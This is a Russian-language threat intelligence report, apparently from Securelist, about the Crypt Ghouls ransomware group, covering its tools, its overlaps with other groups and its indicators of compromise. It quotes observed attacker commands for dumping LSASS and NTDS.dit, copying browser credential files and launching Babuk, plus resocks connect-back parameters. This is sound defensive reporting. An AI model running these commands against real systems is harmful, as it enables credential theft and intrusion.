В декабре 2023 года мы обнаружили ранее неизвестную группу, использующую шифровальщики в атаках на российские компании, в том числе государственные организации. Дальнейшее расследование активности этой группы указывает на ее взаимосвязь с другими активными на текущий момент группами, нацеленными на Россию. Мы наблюдаем пересечения не только в индикаторах компрометации и инструментарии, но и в тактиках, техниках и процедурах (TTP). Более того, в атаках частично совпадает инфраструктура.
В арсенале исследуемой группы имеются такие инструменты, как Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec и другие утилиты, а в качестве конечной нагрузки были использованы уже всем известные шифровальщики LockBit 3.0 и Babuk. Мы назвали группу Crypt Ghouls.
Оглавление
Доставка и закрепление
Определить вектор получения первоначального доступа нам удалось только в двух атаках группы. Злоумышленники использовали учетные данные подрядчика пострадавшей компании, чтобы подключиться через VPN к ее внутренней инфраструктуре. VPN-соединения были инициированы с IP-адресов, принадлежащих одному из российских хостинг-провайдеров, а также с IP-адресов, принадлежащих компании подрядчика. В последнее время получение атакующими первоначального доступа через подрядные организации не редкость. Мы предполагаем, что взлом подрядных организаций происходит также через VPN-сервисы либо через неисправленные уязвимости.
Для сохранения доступа к системе атакующие применяли утилиты NSSM и Localtonet: NSSM позволяет создавать службы на хосте и управлять ими, а Localtonet предоставляет зашифрованный туннель для подключения к хосту из внешней сети. Загружались эти утилиты напрямую с сайта localtonet.com:
hxxp://localtonet.com/nssm-2.24.zip
hxxp://localtonet.com/download/localtonet-win-64.zip
Сбор учетных данных
XenAllPasswordPro
Для сбора различных аутентификационных данных в атакуемой системе злоумышленники использовали утилиту XenAllPasswordPro:
cmd.exe /Q /c c:programdataallinone2023XenAllPasswordPro.exe -a
c:programdatareport.html 1> WindowsTempLNhkey 2>&1
cmd.exe /Q /c cmd /c rmdir /q /s c:programdataallinone2023 1>
WindowsTempHYirzI 2>&1
Эта утилита и путь к ней, allinone2023, стали знаковыми для исследуемой серии атак. Далее представлен список расположений XenAllPasswordPro, которые мы видели в различных инфраструктурах жертв:
c:programdataallinone2023xenallpasswordpro.exe
c:programdatadbgallinone2023xenallpasswordpro.exe
c:programdata1callinone2023xenallpasswordpro.exe
$userdesktopallinone2023xenallpasswordpro.exe
c:intelxenallpasswordpro.exe
Родительским процессом вышеуказанных команд являлся процесс
wmiprvse.exe. Кроме того, мы обнаружили характерный для набора Impacket артефакт в командной строке. Эти признаки указывают на использование модуля WmiExec.py из пакета Impacket:C:WindowsSystem32wbemwmiprvse.exe
В одной из атак Crypt Ghouls мы также обнаружили вредоносный загрузчик бэкдора CobInt — это показательный инструмент, который позволил нам провести параллели с другими кампаниями. Загрузчик CobInt, который мы встретили, представляет собой VBS-скрипт
Intellpui.vbs, выполняющий обфусцированный код PowerShell, который, в свою очередь, обращается к C2-серверу для загрузки бэкдора CobInt в память.
В ряде других случаев злоумышленники использовали протокол RDP вместо WMI:
c:windowssystem32rdpclip.exe
c:programdata1callinone2023xenallpasswordpro.exe -a c:programdata1c2c.txt
Кроме того, в некоторых атаках мы наблюдали сохранение куста реестра
HKLMSECURITY во временную папку. В нем содержатся политики безопасности хоста и секреты LSA (Local Security Authority):C:WindowsSystem32svchost.exe -k localService -p -s RemoteRegistry
RegSaveKey(«$hklmsecurity»,»$tempkjzcehld.tmp»)
Mimikatz
Мы обнаружили использование утилиты Mimikatz в исследуемых атаках. В одном кейсе мы видели ее использование при помощи внедрения вредоносного кода утилиты в память процесса
rundll32.exe.
В другом кейсе мы видели команду Mimikatz, которая создает дамп памяти процесса
lsass.exe. В нем содержатся различные учетные данные аутентифицированных пользователей:sekurlsa::minidump lsass.dmp
Таким образом, при помощи Mimikatz атакующие получали учетные данные жертв.
dumper.ps1
Crypt Ghouls запускали скрипт PowerShell с открытым исходным кодом, который позволяет получить дампы билетов Kerberos из кэша LSA. Атакующие переименовали скрипт, чтобы замаскировать его под скрипт групповой политики:
.gpo_compliance.ps1
MiniDump Tool
MiniDump Tool — утилита, которая разработана для снятия дампа памяти указанного процесса. С ее помощью Crypt Ghouls получали учетные данные из памяти процесса
lsass.exe. Атакующие запускали этот процесс следующей командной строкой:T.exe [lsass_pid] [lsass_pid]
В качестве первого аргумента указывается идентификатор процесса (process identificator, PID). В качестве второго — имя файла и директория, куда будет сохранен дамп выбранного процесса.
MiniDump Tool создает драйвер по следующему пути:
C:Users[username]AppDataLocalTempkxxxxxxx.sys
Затем утилита запускает его и передает ему код управления для чтения памяти процесса, идентификатор которого указан в качестве первого аргумента, после чего сохраняет дамп в системе, в нашем случае — в файл в текущей директории под названием, соответствующим идентификатору процесса.
Учетные данные из браузеров
Crypt Ghouls также копировали файлы, содержащие учетные данные в браузерах, во временную директорию:
cmd.exe /Q /c copy «C:Users[username]AppDataLocalMicrosoftEdgeUser
DataDefaultLogin Data» «C:WindowsTemp1713909129.8364425»
cmd.exe /Q /c copy «C:Users[username]AppDataLocalGoogleChromeUser
DataDefaultLogin Data» «C:WindowsTemp1713909173.8739672»
cmd.exe /Q /c copy «C:Users[username]AppDataLocalMicrosoftEdgeUser
DataDefaultLogin Data» «C:WindowsTemp1713909181.5850394»
Команды на хостах выполнялись при помощи WMI.
После этого атакующие запрашивали список локальных пользователей, используя PowerShell:
c:windowssystem32wbemwmiprvse.exe >
cmd.exe /Q /c powershell.exe «Get-LocalUser | Select name» 1>
WindowsTempqnLJbp 2>&1″
Дамп NTDS.dit
Crypt Ghouls подключались к контроллеру домена через WMI при помощи имеющихся скомпрометированных учетных записей. Подключившись к домену, атакующие попытались сохранить дамп
NTDS.dit. Чтобы получить его, они использовали одну из имеющихся задач в планировщике. Злоумышленники изменили действие задачи четыре раза: сначала получили дамп NTDS.dit с помощью утилиты Ntdsutil, затем заархивировали папку с дампом, после чего удалили ее. Последнее изменение задачи в планировщике возвращает ее исходное значение:powershell.exe out-file -inputobject (ntdsutil.exe ‘ac i ntds’ ‘ifm’
‘create full c:programdataactivedirectory’ q q) -encoding utf8 —
filepath c:programdatamicrosoftvaultdabbf27c-37ef-9946-a3d3-
7aaaebce7577
powershell.exe out-file -inputobject (7zr.exe a c:programdataad.7z
c:programdataactivedirectory) -encoding utf8 -filepath
c:programdatamicrosoftvault4c6b60eb-eafe-ab9b-adfa-ed24b2398e0c
powershell.exe out-file -inputobject (cmd /c rmdir /q /s
c:programdataactivedirectory) — encoding utf8 -filepath
c:programdatamicrosoftvaulta5ad25f1-f569-6247-0722- ad6fe54e350f
Утилита 7-Zip также была загружена с GitHub:
https://github.com/ip7z/7zip/releases/download/23.01/7zr.exe
Однако после архивации мы не обнаружили дальнейшей эксфильтрации данных.
Исследование сети и распространение
Crypt Ghouls использовали утилиту PingCastle (MD5: F4A84D6F1CAF0875B50135423D04139F) для сбора информации об инфраструктуре домена, в котором они находились. Также атакующие периодически сканировали сеть с помощью легитимной утилиты SoftPerfect Network Scanner для определения открытых портов и общих сетевых ресурсов.
Для перемещения по сети, как мы уже видели выше, атакующие использовали модуль Impacket
WmiExec.py.
У двух жертв мы также обнаружили использование PAExec — утилиты для удаленного выполнения команд:
c:windowspaexec-[xxxxx]-[source_host_redacted].exe -service
cmd
Инфраструктура
Группа Crypt Ghouls использует несколько утилит для удаленного доступа. В данных наших исследований особенно часто встречался инструмент AnyDesk, но злоумышленники им не ограничились. В таблице ниже представлены имена утилит и директории, в которых они были замечены:
Наименование
Директория
AnyDesk
C:Users[redacted]DownloadsAnyDesk.exe
Localtonet
C:WindowsTemplocaltonet.exe
resocks
/usr/sbin/xfs-modules
IP-адреса для удаленных подключений AnyDesk и Localtonet принадлежали VPN-подсети Surfshark.
Resocks — это обратный SOCKS5-прокси для туннелирования трафика. В процессе исследования активности этой группы мы нашли образец прокси, для которого в качестве адреса подключения был задан IP-адрес 91.142.73[.]178, принадлежащий подсети хостинг-провайдера VDSina.
Ниже представлены примечательные параметры образца resocks, которые предоставляют дополнительный контекст для исследования:
-X main.defaultConnectBackAddress=91.142.73[.]178 -X
main.defaultConnectionKey=CzKDvHM8UGE/QtjuF2SSkJzaVmRpjNipdWlbTzFry6o
DLL sideloading
Злоумышленники использовали технику DLL sideloading, поместив легитимное приложение для управления инсталляторами Windows
dism.exe и вредоносный загрузчик dismcore.dll в одну папку: c:ProgramDataoracle.
Загрузчик
dismcore.dll пытался найти файл odbcconf.xml, который содержал полезную нагрузку, однако нам не удалось получить этот файл.
Шифрование файлов
Атакующие шифровали данные с помощью популярных зловредов LockBit 3.0 (для систем Windows) и Babuk (для Linux), находящихся в открытом доступе. В конфигурации исследованного нами образца LockBit содержались команды для шифрования локальных дисков, завершения работы определенных процессов и сервисов, отключения Windows Defender, а также удаления журналов событий. В исключения по шифрованию были добавлены системные директории, а также папка
intel, в которую загружались инструменты злоумышленников для сбора учетных данных.
Наше внимание привлекла необычная схема шифрования файлов жертвы. Сначала шифруются файлы с конкретными расширениями, заданными в конфигурации образца LockBit, которые могут представлять интерес для злоумышленников. Однако, помимо них, зловред шифрует файлы в корзине, добавляя в их содержимое сгенерированные случайным образом символы. В дополнение к этому алгоритму мы обнаружили цикл, который меняет имя оригинального файла из корзины итеративно через весь латинский алфавит, пока не дойдет до последней буквы. Подобный метод шифрования значительно затрудняет восстановление пользовательских файлов, а в некоторых случаях делает его невозможным.
Пример отображения в логах:
File Renamed c:$recycle.bin[redacted]desktop.ini
c:$recycle.bin[redacted]aaaaaaaaaaa
File Renamed c:$recycle.bin[redacted]aaaaaaaaaaa
c:$recycle.bin[redacted]bbbbbbbbbbb
File Renamed c:$recycle.bin[redacted]bbbbbbbbbbb
c:$recycle.bin[redacted]ccccccccccc
File Renamed c:$recycle.bin[redacted]ccccccccccc
c:$recycle.bin[redacted]ddddddddddd
После чего алгоритм пытается удалить последний вариант файла
c:$recycle.bin[redacted]zzzzzzzzzzz.
В записке атакующие указывают ссылку с идентификатором пользователя в мессенджере Session для дальнейших коммуникаций:
Этот мессенджер поддерживает сквозное шифрование, что минимизирует риски утечки конфиденциальных данных. Создатели сервиса заявляют, что Session разработан для обеспечения абсолютной приватности переписки. Этот мессенджер также использовали в своих атаках группы шифровальщиков GhostLocker, SEXi и MorLock.
Также злоумышленники атаковали ESXi-серверы при помощи шифровальщика Babuk. Они подключались к серверу ESXi по протоколу SSH, загружали на него Babuk и запускали шифрование файлов виртуальных машин:
/tmp/lock.out «/vmfs/volumes/[redacted]»
Мы полагаем, что целью злоумышленников являлось нарушение бизнес-процессов атакуемых организаций, помимо требования выкупа.
Связи с другими группами
Мы наблюдаем большое количество пересечений в инструментарии и техниках групп вредоносной активности, нацеленных на российские организации и государственные учреждения. Далее мы опишем основные сходства, которые были обнаружены во время изучения атак различных групп.
MorLock
Активность группы MorLock, исследованная экспертами из F.A.C.C.T., имеет множество пересечений с несколькими атаками, которые мы проанализировали в этом отчете. Большая часть используемых этими группами инструментов совпадает: SoftPerfect Network Scanner, XenAllPasswordPro, AnyDesk, PingCastle, Localtonet, NSSM, resocks, LockBit 3.0, Babuk.
Имена файлов и директории, встречавшиеся в атаках этих двух групп, также имеют сходство. Например, мы обнаружили утилиту resocks с именем xfs-healthcheck, и в списке индикаторов, опубликованных F.A.C.C.T., имена resocks имеют такой же шаблон: [xxx]-healthcheck. Аналогичное совпадение мы заметили при исследовании утилиты XenAllPasswordPro: в атаках группы MorLock она находилась в той же директории allinone2023.
Кроме того, мы проверили инфраструктуру группы MorLock по данным F.A.C.C.T. и обнаружили, что эти злоумышленники тоже использовали Surfshark VPN и хостинг VDSina.
BlackJack
При исследовании утилит, которые использовались в атаках Crypt Ghouls, мы обнаружили пересечение с инструментарием группы BlackJack: они тоже использовали XenAllPasswordPro. Это привлекло наше внимание, поскольку эта утилита не очень широко распространена среди злоумышленников, хоть и находится в открытом доступе.
Twelve
Утилита XenAllPasswordPro была замечена и в атаках группы Twelve. Кроме того, у одной из жертв Crypt Ghouls мы обнаружили загрузчик бэкдора CobInt —
Intellpui.vbs, также использовавшийся группой Twelve.
Shedding Zmiy
Shedding Zmiy — это группа, относящаяся к кластеру активности (Ex)Cobalt. В отчете Solar 4RAYS по исследованным инцидентам с участием группы мы нашли еще одно пересечение, а именно использование DLL sideloading с вредоносным загрузчиком
dismcore.dll. Также были упомянуты уже известные нам утилиты и вредоносное ПО: resocks, SoftPerfect Network Scanner, CobInt. Кроме того, группа Shedding Zmiy использовала хостинг VDSina для размещения командных серверов своей инфраструктуры.
Сходство между описанными группами позволяет сделать вывод о том, что активность этих атак пересекается с активностью Crypt Ghouls. Мы изучили используемые злоумышленниками техники и вредоносное ПО и предполагаем, что различные группы имеют доступ к общим ресурсам или поддерживают связь, обмениваясь информацией. В исследованиях других вендоров отмечается участие членов кластера (Ex)Cobalt в активности упомянутых групп, и подобные предположения подтверждаются результатами нашего анализа. На текущий момент мы не можем установить однозначную связь между этими кампаниями, однако мы предполагаем, что их количество будет расти, и продолжим мониторить активность, нацеленную на российские организации.
Жертвы
Жертвами группы Crypt Ghouls стали российские госучреждения и компании в следующих отраслях: горнодобывающая, энергетическая, финансовая, коммерческая.
Заключение
Crypt Ghouls — это еще одна группа, атакующая Россию. Злоумышленники используют скомпрометированные учетные записи, зачастую подрядных организаций, и популярные инструменты с открытым исходным кодом: среди прочего модифицированные конфигурации шифровальщиков LockBit 3.0 и Babuk, билдер и исходный код которых есть в открытом доступе. Поскольку количество злоумышленников, использующих утекшие сборки, растет, идентифицировать виновников угроз становится все сложнее. Использование одних и тех же инструментов в атаках на Россию затрудняет точное разделение активных на текущий момент хактивистских группировок. В атаках Crypt Ghouls мы обнаружили элементы инфраструктуры и целый ряд популярных инструментов, которые также используются многими другими группами, — это может говорить о том, что текущие действующие лица делятся не только знаниями, но и инструментарием. Все это только затрудняет выделение злоумышленников из общей массы вредоносной активности, направленной на российские организации.
Индикаторы компрометации
Обратите внимание: сетевые адреса, приведенные в настоящем разделе, являются действительными на момент публикации, однако могут оказаться неактуальными в перспективе.
SHA256:
01fba22c3e6cf11805afe4ba2f7c303813c83486e07b2b418bf1b3fabfd2544e
dismcore.dll
3edb6fb033cc00c016520e2590e2888e393ad5ed725e853eea3bc86cee3b28b8
resocks
5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32
dumper.ps1
92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50
Mimikatz
dec147d7628d4e3479bc0ff31413621fb4b1b64a618469a9402a42816650f92b
Lockbit 3.0
a54519b7530039b9fba9a4143bf549b67048f441bbebf9f8d5cff1e539752189
Lockbit 3.0
56682344aa1dc0a0a5b0d26bd3a8dfe8ceb8772d6cd9e3f8cbd78ca78fe3c2ab
Babuk
a27d900b1f94cb9e970c5d3b2dcf6686b02fb722eda30c85acc05ba55fdabfbc
MiniDump Tool
eb59a4b1925fdf36dbe41091cb7378291a9116d8150118e4f449cbd1147e204e
kxxxxxxx.sys
Пути к файлам:
С:ProgramDataoracledismcore.dll
odbcconf.xml — payload
C:UsersUserDownloadsdumper.ps1 — dumper.ps1
C:UsersUserDesktopx86x64mimikatz.exe
C:programdata1callinone2023xenallpasswordpro.exe
С:programdataallinone2023xenallpasswordpro.exe
С:programdatadbgallinone2023xenallpasswordpro.exe
С:programdata1callinone2023xenallpasswordpro.exe
$userdesktopallinone2023xenallpasswordpro.exe
C:programdataallinone2023XenAllPasswordPro.exe
C:WindowsTempnssm-2.24win64nssm.exe
C:Users[redacted]DownloadsAnyDesk.exe
C:WindowsTemplocaltonet.exe
C:ProgramDatat.exe (MiniDump Tool)
C:UsersUserAppDataLocalTempkxxxxxxx.sys
C:WindowsTempkxxxxxxx.sys
/tmp/lock.out (Babuk)
/usr/sbin/xfs-healthcheck (resocks)
/usr/sbin/xfs-modules (resocks)
c:programdataintellintellpui.vbs (CobInt)
IP-адреса и URL:
45.11.181[.]152 — netstaticpoints[.]com — CobInt C2
169.150.197[.]10 — SurfShark VPN
169.150.197[.]18 — SurfShark VPN
91.142.73[.]178 — VDSINA-NET
91.142.74[.]87 — VDSINA-NET
95.142.47[.]157 — VDSINA-NET
185.231.155[.]124 — VDSINA-NET
Утилиты:
XenAllPasswordPro
PsExec
PAExec
SoftPerfect Network Scanner
Localtonet
PingCastle
Mimikatz
AnyDesk
NSSM
resocks
Securelist